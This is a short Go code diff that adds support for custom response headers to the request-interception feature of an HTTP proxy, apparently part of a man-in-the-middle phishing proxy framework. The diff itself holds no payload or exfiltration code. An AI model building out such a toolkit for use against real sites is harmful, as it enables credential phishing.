@@ -548,7 +548,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 							//log.Debug("ic.domain:%s r_host:%s", ic.domain, r_host)
 							//log.Debug("ic.path:%s path:%s", ic.path, req.URL.Path)
 							if ic.domain == r_host && ic.path.MatchString(req.URL.Path) {
-								return p.interceptRequest(req, ic.http_status, ic.body, ic.mime)
+								headers := make(map[string]string)
+								if ic.headers != nil {
+									headers = ic.headers
+								}
+								return p.interceptRequest(req, ic.http_status, ic.body, ic.mime, headers)
 							}
 						}
 					}
@@ -1165,18 +1169,26 @@ func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Respon
 	return req, nil
 }
 
-func (p *HttpProxy) interceptRequest(req *http.Request, http_status int, body string, mime string) (*http.Request, *http.Response) {
+func (p *HttpProxy) interceptRequest(req *http.Request, http_status int, body string, mime string, headers map[string]string) (*http.Request, *http.Response) {
 	if mime == "" {
 		mime = "text/plain"
 	}
+
 	resp := goproxy.NewResponse(req, mime, http_status, body)
+
 	if resp != nil {
 		origin := req.Header.Get("Origin")
 		if origin != "" {
 			resp.Header.Set("Access-Control-Allow-Origin", origin)
 		}
+
+		for headerKey, headerValue := range headers {
+			resp.Header.Set(headerKey, headerValue)
+		}
+
 		return req, resp
 	}
+
 	return req, nil
 }
 
